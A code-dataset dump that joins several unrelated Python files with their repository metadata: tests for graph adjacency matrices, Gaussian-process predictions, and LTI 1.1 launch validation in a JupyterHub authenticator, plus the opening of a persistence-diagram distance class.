Adjacency Matrix k-Nearest Neighbors test
"""
# import data
data = np.array([[-1, -1], [-2, -1], [-3, -2], [1, 1], [2, 1], [3, 2]])
# set default parameters
radius = 1.5
algorithm = 'brute'
method = 'radius'
weight = 'heat'
adjacency_kwargs = {'gamma': 1.0}
gamma = 1.0
# sklearn adjacency matrix
nbrs = NearestNeighbors(radius=radius,
algorithm=algorithm).fit(data)
sklearn_mat = nbrs.radius_neighbors_graph(data)
sklearn_mat.data = np.exp(-sklearn_mat.data**2 / gamma**2)
sklearn_mat = sklearn_mat.toarray()
# my routine
my_mat = adjacency(data,
radius=radius,
algorithm=algorithm,
method=method,
weight=weight,
adjacency_kwargs=adjacency_kwargs)
my_mat = my_mat.toarray()
# assert adjacency matrices are equal
msg = 'Distance values comparison.'
assert_equal(sklearn_mat.all(), my_mat.all(), msg=msg)
def test_adjacency_r_brute_angle():
"""
Adjacency Matrix k-Nearest Neighbors test
"""
# import data
data = np.array([[-1, -1], [-2, -1], [-3, -2], [1, 1], [2, 1], [3, 2]])
# set default parameters
radius = 1.5
algorithm = 'brute'
method = 'radius'
weight = 'angle'
# sklearn adjacency matrix
nbrs = NearestNeighbors(radius=radius,
algorithm=algorithm).fit(data)
sklearn_mat = nbrs.radius_neighbors_graph(data)
sklearn_mat.data = np.exp(-np.arccos(1-sklearn_mat.data))
sklearn_mat = sklearn_mat.toarray()
# my routine
my_mat = adjacency(data,
radius=radius,
algorithm=algorithm,
method=method,
weight=weight)
my_mat = my_mat.toarray()
# assert adjacency matrices are equal
msg = 'Distance values comparison.'
assert_equal(sklearn_mat.all(), my_mat.all(), msg=msg)
# TODO: test adjacency
# check parameters:
# * algorithms - annoy, ball_tree, lshf, kd_tree,
# pyflann, cyflann (k, radius)
# * default: nearest_neighbor_kwargs
# * default: adjacency_kwargs
# TODO: test create_adjacency
# check parameters:
# * distances
# * indices
# * weight - heat, angle
# * weight_kwargs
# TODO: test create_constraint
# check parameters:
# * adjacency_matrix
# * constraint - degree, identity, k-scaling
# * laplacian_matrix (for K-Scaling)
# TODO: test create_laplacian
# TODO: maximum
| 28.479839
| 75
| 0.605692
| 840
| 7,063
| 4.940476
| 0.15119
| 0.077108
| 0.047229
| 0.011566
| 0.802651
| 0.799759
| 0.768434
| 0.766024
| 0.766024
| 0.766024
| 0
| 0.02013
| 0.282599
| 7,063
| 247
| 76
| 28.595142
| 0.798895
| 0.266884
| 0
| 0.915254
| 0
| 0
| 0.049105
| 0
| 0
| 0
| 0
| 0.004049
| 0.059322
| 1
| 0.050847
| false
| 0
| 0.033898
| 0
| 0.084746
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
48240a62329cd3327ea4cc491f193c86197dd20d
| 136
|
py
|
Python
|
predicteasy/core/nlp/__init__.py
|
CleverInsight/predicteasy
|
d16354b46abc1de032c7b188666533898847fac1
|
[
"BSD-3-Clause"
] | 1
|
2021-09-06T21:20:06.000Z
|
2021-09-06T21:20:06.000Z
|
predicteasy/core/nlp/__init__.py
|
CleverInsight/predicteasy
|
d16354b46abc1de032c7b188666533898847fac1
|
[
"BSD-3-Clause"
] | 13
|
2020-07-16T10:51:25.000Z
|
2020-07-16T10:53:56.000Z
|
predicteasy/core/nlp/__init__.py
|
CleverInsight/predicteasy
|
d16354b46abc1de032c7b188666533898847fac1
|
[
"BSD-3-Clause"
] | 2
|
2020-07-16T10:45:26.000Z
|
2020-07-16T10:46:04.000Z
|
from predicteasy.core.nlp.sentiment import *
from predicteasy.core.nlp.summarize import *
from predicteasy.core.nlp.spelling import *
| 22.666667
| 44
| 0.808824
| 18
| 136
| 6.111111
| 0.444444
| 0.409091
| 0.518182
| 0.6
| 0.509091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102941
| 136
| 5
| 45
| 27.2
| 0.901639
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
82f2312f69dda837db6d3bcbd25f99c035402721
| 2,125
|
py
|
Python
|
tests/test_predict.py
|
thomaspinder/GPJax
|
929fcb88d13d15bb10e1175491dbc3e79622325a
|
[
"Apache-2.0"
] | 44
|
2020-12-03T14:07:39.000Z
|
2022-03-14T17:45:34.000Z
|
tests/test_predict.py
|
thomaspinder/GPJax
|
929fcb88d13d15bb10e1175491dbc3e79622325a
|
[
"Apache-2.0"
] | 28
|
2020-12-05T08:54:45.000Z
|
2022-03-01T09:56:50.000Z
|
tests/test_predict.py
|
thomaspinder/GPJax
|
929fcb88d13d15bb10e1175491dbc3e79622325a
|
[
"Apache-2.0"
] | 7
|
2021-02-05T12:37:57.000Z
|
2022-03-13T13:00:20.000Z
|
import jax.numpy as jnp
import jax.random as jr
from gpjax import Dataset, Prior
from gpjax.kernels import RBF
from gpjax.likelihoods import Bernoulli, Gaussian
from gpjax.parameters import initialise
from gpjax.predict import mean, variance
def test_conjugate_mean():
key = jr.PRNGKey(123)
x = jr.uniform(key, shape=(20, 1), minval=-3.0, maxval=3.0)
y = jnp.sin(x)
D = Dataset(X=x, y=y)
posterior = Prior(kernel=RBF()) * Gaussian()
params = initialise(posterior)
xtest = jnp.linspace(-3.0, 3.0, 30).reshape(-1, 1)
meanf = mean(posterior, params, D)
mu = meanf(xtest)
assert mu.shape == (xtest.shape[0], y.shape[1])
def test_conjugate_variance():
key = jr.PRNGKey(123)
x = jr.uniform(key, shape=(20, 1), minval=-3.0, maxval=3.0)
y = jnp.sin(x)
D = Dataset(X=x, y=y)
posterior = Prior(kernel=RBF()) * Gaussian()
params = initialise(posterior)
xtest = jnp.linspace(-3.0, 3.0, 30).reshape(-1, 1)
varf = variance(posterior, params, D)
sigma = varf(xtest)
assert sigma.shape == (xtest.shape[0], xtest.shape[0])
def test_non_conjugate_mean():
key = jr.PRNGKey(123)
x = jnp.sort(jr.uniform(key, shape=(10, 1), minval=-1.0, maxval=1.0), axis=0)
y = 0.5 * jnp.sign(jnp.cos(3 * x + jr.normal(key, shape=x.shape) * 0.05)) + 0.5
D = Dataset(X=x, y=y)
xtest = jnp.linspace(-1.05, 1.05, 50).reshape(-1, 1)
posterior = Prior(kernel=RBF()) * Bernoulli()
params = initialise(posterior, x.shape[0])
meanf = mean(posterior, params, D)
mu = meanf(xtest)
assert mu.shape == (xtest.shape[0],)
def test_non_conjugate_variance():
key = jr.PRNGKey(123)
x = jnp.sort(jr.uniform(key, shape=(10, 1), minval=-1.0, maxval=1.0), axis=0)
y = 0.5 * jnp.sign(jnp.cos(3 * x + jr.normal(key, shape=x.shape) * 0.05)) + 0.5
D = Dataset(X=x, y=y)
xtest = jnp.linspace(-1.05, 1.05, 50).reshape(-1, 1)
posterior = Prior(kernel=RBF()) * Bernoulli()
params = initialise(posterior, x.shape[0])
varf = variance(posterior, params, D)
sigma = varf(xtest)
assert sigma.shape == (xtest.shape[0],)
| 30.797101
| 83
| 0.629647
| 345
| 2,125
| 3.849275
| 0.176812
| 0.040663
| 0.041416
| 0.045181
| 0.832078
| 0.832078
| 0.832078
| 0.763554
| 0.763554
| 0.763554
| 0
| 0.059684
| 0.195765
| 2,125
| 68
| 84
| 31.25
| 0.717379
| 0
| 0
| 0.705882
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.078431
| 1
| 0.078431
| false
| 0
| 0.137255
| 0
| 0.215686
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d24e569733e74a54f0efdc4bf4c198560ebe4c98
| 19,686
|
py
|
Python
|
ltiauthenticator/tests/test_lti11_validator.py
|
regisb/ltiauthenticator
|
c32307f7baf8a9a50863faf806983e1dd00ef6c4
|
[
"BSD-3-Clause"
] | 54
|
2018-01-20T03:09:30.000Z
|
2022-03-22T04:30:44.000Z
|
ltiauthenticator/tests/test_lti11_validator.py
|
regisb/ltiauthenticator
|
c32307f7baf8a9a50863faf806983e1dd00ef6c4
|
[
"BSD-3-Clause"
] | 68
|
2018-01-12T23:55:03.000Z
|
2022-01-27T14:24:08.000Z
|
ltiauthenticator/tests/test_lti11_validator.py
|
regisb/ltiauthenticator
|
c32307f7baf8a9a50863faf806983e1dd00ef6c4
|
[
"BSD-3-Clause"
] | 46
|
2018-02-23T09:17:29.000Z
|
2022-03-21T20:11:06.000Z
|
import pytest
from tornado.web import HTTPError
from ltiauthenticator.lti11.validator import LTI11LaunchValidator
def test_basic_lti11_launch_request(make_lti11_basic_launch_request_args):
"""
Does a standard launch request work?
"""
oauth_consumer_key = "my_consumer_key"
oauth_consumer_secret = "my_shared_secret"
launch_url = "http://jupyterhub/hub/lti/launch"
headers = {"Content-Type": "application/x-www-form-urlencoded"}
args = make_lti11_basic_launch_request_args(
oauth_consumer_key,
oauth_consumer_secret,
)
validator = LTI11LaunchValidator({oauth_consumer_key: oauth_consumer_secret})
assert validator.validate_launch_request(launch_url, headers, args)
def test_launch_with_missing_oauth_nonce_key(make_lti11_basic_launch_request_args):
"""
Does the launch request work with a missing oauth_nonce key?
"""
oauth_consumer_key = "my_consumer_key"
oauth_consumer_secret = "my_shared_secret"
launch_url = "http://jupyterhub/hub/lti/launch"
headers = {"Content-Type": "application/x-www-form-urlencoded"}
args = make_lti11_basic_launch_request_args(
oauth_consumer_key,
oauth_consumer_secret,
)
del args["oauth_nonce"]
validator = LTI11LaunchValidator({oauth_consumer_key: oauth_consumer_secret})
with pytest.raises(HTTPError):
validator.validate_launch_request(launch_url, headers, args)
def test_launch_with_empty_oauth_nonce_value(
make_lti11_basic_launch_request_args,
):
"""
Does the launch request work with an empty oauth_nonce value?
"""
oauth_consumer_key = "my_consumer_key"
oauth_consumer_secret = "my_shared_secret"
launch_url = "http://jupyterhub/hub/lti/launch"
headers = {"Content-Type": "application/x-www-form-urlencoded"}
args = make_lti11_basic_launch_request_args(
oauth_consumer_key,
oauth_consumer_secret,
)
validator = LTI11LaunchValidator({oauth_consumer_key: oauth_consumer_secret})
with pytest.raises(HTTPError):
args["oauth_nonce"] = ""
validator.validate_launch_request(launch_url, headers, args)
def test_launch_with_missing_oauth_timestamp_key(make_lti11_basic_launch_request_args):
"""
Does the launch request work with a missing oauth_timestamp key?
"""
oauth_consumer_key = "my_consumer_key"
oauth_consumer_secret = "my_shared_secret"
launch_url = "http://jupyterhub/hub/lti/launch"
headers = {"Content-Type": "application/x-www-form-urlencoded"}
args = make_lti11_basic_launch_request_args(
oauth_consumer_key,
oauth_consumer_secret,
)
del args["oauth_timestamp"]
validator = LTI11LaunchValidator({oauth_consumer_key: oauth_consumer_secret})
with pytest.raises(HTTPError):
validator.validate_launch_request(launch_url, headers, args)
def test_launch_with_missing_oauth_consumer_key_key(
make_lti11_basic_launch_request_args,
):
"""
Does the launch request work with a missing oauth_consumer_key key?
"""
oauth_consumer_key = "my_consumer_key"
oauth_consumer_secret = "my_shared_secret"
launch_url = "http://jupyterhub/hub/lti/launch"
headers = {"Content-Type": "application/x-www-form-urlencoded"}
args = make_lti11_basic_launch_request_args(
oauth_consumer_key,
oauth_consumer_secret,
)
del args["oauth_consumer_key"]
validator = LTI11LaunchValidator({oauth_consumer_key: oauth_consumer_secret})
with pytest.raises(HTTPError):
validator.validate_launch_request(launch_url, headers, args)
def test_launch_with_empty_oauth_consumer_key_value(
make_lti11_basic_launch_request_args,
):
"""
Does the launch request work with an empty oauth_consumer_key value?
"""
oauth_consumer_key = "my_consumer_key"
oauth_consumer_secret = "my_shared_secret"
launch_url = "http://jupyterhub/hub/lti/launch"
headers = {"Content-Type": "application/x-www-form-urlencoded"}
args = make_lti11_basic_launch_request_args(
oauth_consumer_key,
oauth_consumer_secret,
)
validator = LTI11LaunchValidator({oauth_consumer_key: oauth_consumer_secret})
with pytest.raises(HTTPError):
args["oauth_consumer_key"] = ""
validator.validate_launch_request(launch_url, headers, args)
def test_launch_with_fake_oauth_consumer_key_value(
make_lti11_basic_launch_request_args,
):
"""
Does the launch request work when the consumer_key isn't correct?
"""
oauth_consumer_key = "my_consumer_key"
oauth_consumer_secret = "my_shared_secret"
launch_url = "http://jupyterhub/hub/lti/launch"
headers = {"Content-Type": "application/x-www-form-urlencoded"}
args = make_lti11_basic_launch_request_args(
oauth_consumer_key,
oauth_consumer_secret,
)
validator = LTI11LaunchValidator({oauth_consumer_key: oauth_consumer_secret})
with pytest.raises(HTTPError):
args["oauth_consumer_key"] = [b"fake_consumer_key"][0].decode("utf-8")
assert validator.validate_launch_request(launch_url, headers, args)
def test_launch_with_missing_oauth_signature_method_key(
make_lti11_basic_launch_request_args,
):
"""
Does the launch request work with a missing oauth_signature_method key?
"""
oauth_consumer_key = "my_consumer_key"
oauth_consumer_secret = "my_shared_secret"
launch_url = "http://jupyterhub/hub/lti/launch"
headers = {"Content-Type": "application/x-www-form-urlencoded"}
args = make_lti11_basic_launch_request_args(
oauth_consumer_key, oauth_consumer_secret
)
del args["oauth_signature_method"]
validator = LTI11LaunchValidator({oauth_consumer_key: oauth_consumer_secret})
with pytest.raises(HTTPError):
validator.validate_launch_request(launch_url, headers, args)
def test_launch_with_empty_oauth_signature_method_value(
make_lti11_basic_launch_request_args,
):
"""
Does the launch request work with an empty oauth_signature_method value?
"""
oauth_consumer_key = "my_consumer_key"
oauth_consumer_secret = "my_shared_secret"
launch_url = "http://jupyterhub/hub/lti/launch"
headers = {"Content-Type": "application/x-www-form-urlencoded"}
args = make_lti11_basic_launch_request_args(
oauth_consumer_key,
oauth_consumer_secret,
)
validator = LTI11LaunchValidator({oauth_consumer_key: oauth_consumer_secret})
with pytest.raises(HTTPError):
args["oauth_signature_method"] = ""
validator.validate_launch_request(launch_url, headers, args)
def test_launch_with_missing_oauth_callback_key(make_lti11_basic_launch_request_args):
"""
Does the launch request work with a missing oauth_callback key?
"""
oauth_consumer_key = "my_consumer_key"
oauth_consumer_secret = "my_shared_secret"
launch_url = "http://jupyterhub/hub/lti/launch"
headers = {"Content-Type": "application/x-www-form-urlencoded"}
args = make_lti11_basic_launch_request_args(
oauth_consumer_key,
oauth_consumer_secret,
)
del args["oauth_callback"]
validator = LTI11LaunchValidator({oauth_consumer_key: oauth_consumer_secret})
with pytest.raises(HTTPError):
validator.validate_launch_request(launch_url, headers, args)
def test_launch_with_empty_oauth_callback_value(
make_lti11_basic_launch_request_args,
):
"""
Does the launch request work with an empty oauth_callback value?
"""
oauth_consumer_key = "my_consumer_key"
oauth_consumer_secret = "my_shared_secret"
launch_url = "http://jupyterhub/hub/lti/launch"
headers = {"Content-Type": "application/x-www-form-urlencoded"}
args = make_lti11_basic_launch_request_args(
oauth_consumer_key,
oauth_consumer_secret,
)
validator = LTI11LaunchValidator({oauth_consumer_key: oauth_consumer_secret})
with pytest.raises(HTTPError):
args["oauth_callback"] = ""
validator.validate_launch_request(launch_url, headers, args)
def test_launch_with_missing_oauth_version_key(make_lti11_basic_launch_request_args):
"""
Does the launch request work with a missing oauth_version key?
"""
oauth_consumer_key = "my_consumer_key"
oauth_consumer_secret = "my_shared_secret"
launch_url = "http://jupyterhub/hub/lti/launch"
headers = {"Content-Type": "application/x-www-form-urlencoded"}
args = make_lti11_basic_launch_request_args(
oauth_consumer_key,
oauth_consumer_secret,
)
del args["oauth_version"]
validator = LTI11LaunchValidator({oauth_consumer_key: oauth_consumer_secret})
with pytest.raises(HTTPError):
validator.validate_launch_request(launch_url, headers, args)
def test_launch_with_empty_oauth_version_value(
make_lti11_basic_launch_request_args,
):
"""
Does the launch request work with an empty oauth_version value?
"""
oauth_consumer_key = "my_consumer_key"
oauth_consumer_secret = "my_shared_secret"
launch_url = "http://jupyterhub/hub/lti/launch"
headers = {"Content-Type": "application/x-www-form-urlencoded"}
args = make_lti11_basic_launch_request_args(
oauth_consumer_key,
oauth_consumer_secret,
)
validator = LTI11LaunchValidator({oauth_consumer_key: oauth_consumer_secret})
with pytest.raises(HTTPError):
args["oauth_version"] = ""
validator.validate_launch_request(launch_url, headers, args)
def test_launch_with_missing_oauth_signature_key(make_lti11_basic_launch_request_args):
"""
Does the launch request work with a missing oauth_signature key?
"""
oauth_consumer_key = "my_consumer_key"
oauth_consumer_secret = "my_shared_secret"
launch_url = "http://jupyterhub/hub/lti/launch"
headers = {"Content-Type": "application/x-www-form-urlencoded"}
args = make_lti11_basic_launch_request_args(
oauth_consumer_key,
oauth_consumer_secret,
)
del args["oauth_signature"]
validator = LTI11LaunchValidator({oauth_consumer_key: oauth_consumer_secret})
with pytest.raises(HTTPError):
validator.validate_launch_request(launch_url, headers, args)
def test_launch_with_empty_oauth_signature_value(
make_lti11_basic_launch_request_args,
):
"""
Does the launch request work with an empty oauth_signature value?
"""
oauth_consumer_key = "my_consumer_key"
oauth_consumer_secret = "my_shared_secret"
launch_url = "http://jupyterhub/hub/lti/launch"
headers = {"Content-Type": "application/x-www-form-urlencoded"}
args = make_lti11_basic_launch_request_args(
oauth_consumer_key,
oauth_consumer_secret,
)
validator = LTI11LaunchValidator({oauth_consumer_key: oauth_consumer_secret})
with pytest.raises(HTTPError):
args["oauth_signature"] = ""
validator.validate_launch_request(launch_url, headers, args)
def test_unregistered_consumer_key(make_lti11_basic_launch_request_args):
"""
Does the launch request work with a consumer key that does not match?
"""
oauth_consumer_key = "my_consumer_key"
oauth_consumer_secret = "my_shared_secret"
launch_url = "http://jupyterhub/hub/lti/launch"
headers = {"Content-Type": "application/x-www-form-urlencoded"}
args = make_lti11_basic_launch_request_args(
oauth_consumer_key,
oauth_consumer_secret,
)
validator = LTI11LaunchValidator({oauth_consumer_key: oauth_consumer_secret})
args["oauth_consumer_key"] = "fake_consumer_key"
with pytest.raises(HTTPError):
assert validator.validate_launch_request(launch_url, headers, args)
def test_unregistered_shared_secret(make_lti11_basic_launch_request_args):
"""
Does the launch request work with a shared secret that does not match?
"""
oauth_consumer_key = "my_consumer_key"
oauth_consumer_secret = "my_shared_secret"
launch_url = "http://jupyterhub/hub/lti/launch"
headers = {"Content-Type": "application/x-www-form-urlencoded"}
args = make_lti11_basic_launch_request_args(
oauth_consumer_key,
oauth_consumer_secret,
)
validator = LTI11LaunchValidator({oauth_consumer_key: "my_other_shared_secret"})
with pytest.raises(HTTPError):
validator.validate_launch_request(launch_url, headers, args)
def test_launch_with_missing_lti_message_type(make_lti11_basic_launch_request_args):
"""
Does the launch request work with a missing lti_message_type argument?
"""
oauth_consumer_key = "my_consumer_key"
oauth_consumer_secret = "my_shared_secret"
launch_url = "http://jupyterhub/hub/lti/launch"
headers = {"Content-Type": "application/x-www-form-urlencoded"}
args = make_lti11_basic_launch_request_args(
oauth_consumer_key,
oauth_consumer_secret,
)
del args["lti_message_type"]
validator = LTI11LaunchValidator({oauth_consumer_key: oauth_consumer_secret})
with pytest.raises(HTTPError):
validator.validate_launch_request(launch_url, headers, args)
def test_launch_with_empty_lti_message_type(
make_lti11_basic_launch_request_args,
):
"""
Does the launch request work with an empty lti_message_type value?
"""
oauth_consumer_key = "my_consumer_key"
oauth_consumer_secret = "my_shared_secret"
launch_url = "http://jupyterhub/hub/lti/launch"
headers = {"Content-Type": "application/x-www-form-urlencoded"}
args = make_lti11_basic_launch_request_args(
oauth_consumer_key,
oauth_consumer_secret,
)
validator = LTI11LaunchValidator({oauth_consumer_key: oauth_consumer_secret})
with pytest.raises(HTTPError):
args["lti_message_type"] = ""
validator.validate_launch_request(launch_url, headers, args)
def test_launch_with_missing_lti_version(make_lti11_basic_launch_request_args):
"""
Does the launch request work with a missing oauth_signature key?
"""
oauth_consumer_key = "my_consumer_key"
oauth_consumer_secret = "my_shared_secret"
launch_url = "http://jupyterhub/hub/lti/launch"
headers = {"Content-Type": "application/x-www-form-urlencoded"}
args = make_lti11_basic_launch_request_args(
oauth_consumer_key,
oauth_consumer_secret,
)
del args["lti_version"]
validator = LTI11LaunchValidator({oauth_consumer_key: oauth_consumer_secret})
with pytest.raises(HTTPError):
validator.validate_launch_request(launch_url, headers, args)
def test_launch_with_empty_lti_version(make_lti11_basic_launch_request_args):
"""
Does the launch request work with an empty oauth_signature value?
"""
oauth_consumer_key = "my_consumer_key"
oauth_consumer_secret = "my_shared_secret"
launch_url = "http://jupyterhub/hub/lti/launch"
headers = {"Content-Type": "application/x-www-form-urlencoded"}
args = make_lti11_basic_launch_request_args(
oauth_consumer_key,
oauth_consumer_secret,
)
validator = LTI11LaunchValidator({oauth_consumer_key: oauth_consumer_secret})
with pytest.raises(HTTPError):
args["lti_version"] = ""
validator.validate_launch_request(launch_url, headers, args)
def test_launch_with_missing_resource_link_id(make_lti11_basic_launch_request_args):
"""
Does the launch request work with a missing resource_link_id key?
"""
oauth_consumer_key = "my_consumer_key"
oauth_consumer_secret = "my_shared_secret"
launch_url = "http://jupyterhub/hub/lti/launch"
headers = {"Content-Type": "application/x-www-form-urlencoded"}
args = make_lti11_basic_launch_request_args(
oauth_consumer_key,
oauth_consumer_secret,
)
del args["resource_link_id"]
validator = LTI11LaunchValidator({oauth_consumer_key: oauth_consumer_secret})
with pytest.raises(HTTPError):
validator.validate_launch_request(launch_url, headers, args)
def test_launch_with_empty_resource_link_id(
make_lti11_basic_launch_request_args,
):
"""
Does the launch request work with an empty resource_link_id value?
"""
oauth_consumer_key = "my_consumer_key"
oauth_consumer_secret = "my_shared_secret"
launch_url = "http://jupyterhub/hub/lti/launch"
headers = {"Content-Type": "application/x-www-form-urlencoded"}
args = make_lti11_basic_launch_request_args(
oauth_consumer_key,
oauth_consumer_secret,
)
validator = LTI11LaunchValidator({oauth_consumer_key: oauth_consumer_secret})
with pytest.raises(HTTPError):
args["resource_link_id"] = ""
validator.validate_launch_request(launch_url, headers, args)
def test_launch_with_missing_user_id_key(make_lti11_basic_launch_request_args):
"""
Does the launch request work with a missing user_id key?
"""
oauth_consumer_key = "my_consumer_key"
oauth_consumer_secret = "my_shared_secret"
launch_url = "http://jupyterhub/hub/lti/launch"
headers = {"Content-Type": "application/x-www-form-urlencoded"}
args = make_lti11_basic_launch_request_args(
oauth_consumer_key,
oauth_consumer_secret,
)
del args["user_id"]
validator = LTI11LaunchValidator({oauth_consumer_key: oauth_consumer_secret})
with pytest.raises(HTTPError):
validator.validate_launch_request(launch_url, headers, args)
def test_launch_with_empty_user_id_value(make_lti11_basic_launch_request_args):
"""
Does the launch request work with an empty user_id value?
"""
oauth_consumer_key = "my_consumer_key"
oauth_consumer_secret = "my_shared_secret"
launch_url = "http://jupyterhub/hub/lti/launch"
headers = {"Content-Type": "application/x-www-form-urlencoded"}
args = make_lti11_basic_launch_request_args(
oauth_consumer_key,
oauth_consumer_secret,
)
validator = LTI11LaunchValidator({oauth_consumer_key: oauth_consumer_secret})
with pytest.raises(HTTPError):
args["user_id"] = ""
validator.validate_launch_request(launch_url, headers, args)
def test_launch_with_same_oauth_timestamp_different_oauth_nonce(
make_lti11_basic_launch_request_args,
):
"""
Does the launch request pass with when using a different nonce with the
same timestamp?
"""
oauth_consumer_key = "my_consumer_key"
oauth_consumer_secret = "my_shared_secret"
launch_url = "http://jupyterhub/hub/lti/launch"
headers = {"Content-Type": "application/x-www-form-urlencoded"}
args = make_lti11_basic_launch_request_args(
oauth_consumer_key,
oauth_consumer_secret,
)
validator = LTI11LaunchValidator({oauth_consumer_key: oauth_consumer_secret})
with pytest.raises(HTTPError):
args["oauth_nonce"] = "fake_nonce"
validator.validate_launch_request(launch_url, headers, args)
def test_launch_with_same_oauth_nonce_different_oauth_timestamp(
make_lti11_basic_launch_request_args,
):
"""
Does the launch request pass with when using a different timestamp with the
same nonce?
"""
oauth_consumer_key = "my_consumer_key"
oauth_consumer_secret = "my_shared_secret"
launch_url = "http://jupyterhub/hub/lti/launch"
headers = {"Content-Type": "application/x-www-form-urlencoded"}
args = make_lti11_basic_launch_request_args(
oauth_consumer_key, oauth_consumer_secret
)
validator = LTI11LaunchValidator({oauth_consumer_key: oauth_consumer_secret})
with pytest.raises(HTTPError):
args["oauth_timestamp"] = "0123456789"
validator.validate_launch_request(launch_url, headers, args)
| 32.431631
| 87
| 0.738393
| 2,433
| 19,686
| 5.546239
| 0.033703
| 0.163776
| 0.106714
| 0.142285
| 0.949755
| 0.940418
| 0.940418
| 0.937824
| 0.934119
| 0.934119
| 0
| 0.011065
| 0.173677
| 19,686
| 606
| 88
| 32.485149
| 0.818467
| 0.09108
| 0
| 0.778667
| 0
| 0
| 0.192231
| 0.054751
| 0
| 0
| 0
| 0
| 0.008
| 1
| 0.072
| false
| 0
| 0.008
| 0
| 0.08
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d26ad65ebb841cb4464714963fb2672339818ce5
| 15,738
|
py
|
Python
|
giotto/diagrams/distance.py
|
fossabot/giotto-learn-1
|
e68dacf2f34bd0d0513c816a723627431bed4b4a
|
[
"Apache-2.0"
] | 1
|
2020-03-27T12:09:09.000Z
|
2020-03-27T12:09:09.000Z
|
giotto/diagrams/distance.py
|
marta-l2f/giotto-learn
|
7e693b76e03ea422a3046fc8931f0be6b02fab64
|
[
"Apache-2.0"
] | null | null | null |
giotto/diagrams/distance.py
|
marta-l2f/giotto-learn
|
7e693b76e03ea422a3046fc8931f0be6b02fab64
|
[
"Apache-2.0"
] | null | null | null |
# License: Apache 2.0
import numpy as np
from sklearn.base import BaseEstimator, TransformerMixin
from sklearn.utils.validation import check_is_fitted
from ._metrics import _parallel_pairwise, _parallel_amplitude
from ._utils import _discretize
from ..utils.validation import check_diagram, validate_params, \
validate_metric_params
class PairwiseDistance(BaseEstimator, TransformerMixin):
"""`Distances <https://giotto.ai/theory>`_ between pairs of persistence
diagrams, constructed from the distances between their respective
subdiagrams with constant homology dimension.
Given two collections of persistence diagrams consisting of
birth-death-dimension triples [b, d, q], a collection of distance
matrices or a single distance matrix between pairs of diagrams is
calculated according to the following steps:
1. All diagrams are partitioned into subdiagrams corresponding to
distinct homology dimensions.
2. Pairwise distances between subdiagrams of equal homology
dimension are calculated according to the parameters `metric` and
`metric_params`. This gives a collection of distance matrices,
:math:`\\mathbf{D} = (D_{q_1}, \\ldots, D_{q_n})`.
3. The final result is either :math:`\\mathbf{D}` itself as a
three-dimensional array, or a single distance matrix constructed
by taking norms of the vectors of distances between diagram pairs.
Parameters
----------
metric : ``'bottleneck'`` | ``'wasserstein'`` | ``'landscape'`` | \
``'betti'`` | ``'heat'``, optional, default: ``'landscape'``
Distance or dissimilarity function between subdiagrams:
- ``'bottleneck'`` and ``'wasserstein'`` refer to the identically named
perfect-matching--based notions of distance.
- ``'landscape'`` refers to the :math:`L^p` distance between
persistence landscapes.
- ``'betti'`` refers to the :math:`L^p` distance between Betti curves.
- ``'heat'`` refers to the :math:`L^p` distance between
Gaussian-smoothed diagrams.
metric_params : dict or None, optional, default: ``None``
Additional keyword arguments for the metric function:
- If ``metric == 'bottleneck'`` the only argument is `delta` (float,
default: ``0.01``). When equal to ``0.``, an exact algorithm is
used; otherwise, a faster approximate algorithm is used.
- If ``metric == 'wasserstein'`` the available arguments are `p`
(int, default: ``2``) and `delta` (float, default: ``0.01``).
Unlike the case of ``'bottleneck'``, `delta` cannot be set to
``0.`` and an exact algorithm is not available.
- If ``metric == 'betti'`` the available arguments are `p` (float,
default: ``2.``) and `n_values` (int, default: ``100``).
- If ``metric == 'landscape'`` the available arguments are `p`
(float, default: ``2.``), `n_values` (int, default: ``100``) and
`n_layers` (int, default: ``1``).
- If ``metric == 'heat'`` the available arguments are `p`
(float, default: ``2.``), `sigma` (float, default: ``1.``) and
`n_values` (int, default: ``100``).
order : float or None, optional, default: ``2.``
If ``None``, :meth:`transform` returns for each pair of diagrams a
vector of distances corresponding to the dimensions in
:attr:`homology_dimensions_`. Otherwise, the :math:`p`-norm of
these vectors with :math:`p` equal to `order` is taken.
n_jobs : int or None, optional, default: ``None``
The number of jobs to use for the computation. ``None`` means 1 unless
in a :obj:`joblib.parallel_backend` context. ``-1`` means using all
processors.
Attributes
----------
effective_metric_params_ : dict
Dictionary containing all information present in `metric_params` as
well as on any relevant quantities computed in :meth:`fit`.
homology_dimensions_ : list
Homology dimensions seen in :meth:`fit`, sorted in ascending order.
See also
--------
Amplitude, BettiCurve, PersistenceLandscape, HeatKernel, \
giotto.homology.VietorisRipsPersistence
Notes
-----
To compute distances without first splitting the computation between
different homology dimensions, data should be first transformed by an
instance of :class:`ForgetDimension`.
`Hera <https://bitbucket.org/grey_narn/hera>`_ is used as a C++ backend
for computing bottleneck and Wasserstein distances between persistence
diagrams. Python bindings were modified for performance from the
`Dyonisus 2 <https://mrzv.org/software/dionysus2/>`_ package.
"""
_hyperparameters = {'order': [float, (1, np.inf)]}
def __init__(self, metric='landscape', metric_params=None, order=2.,
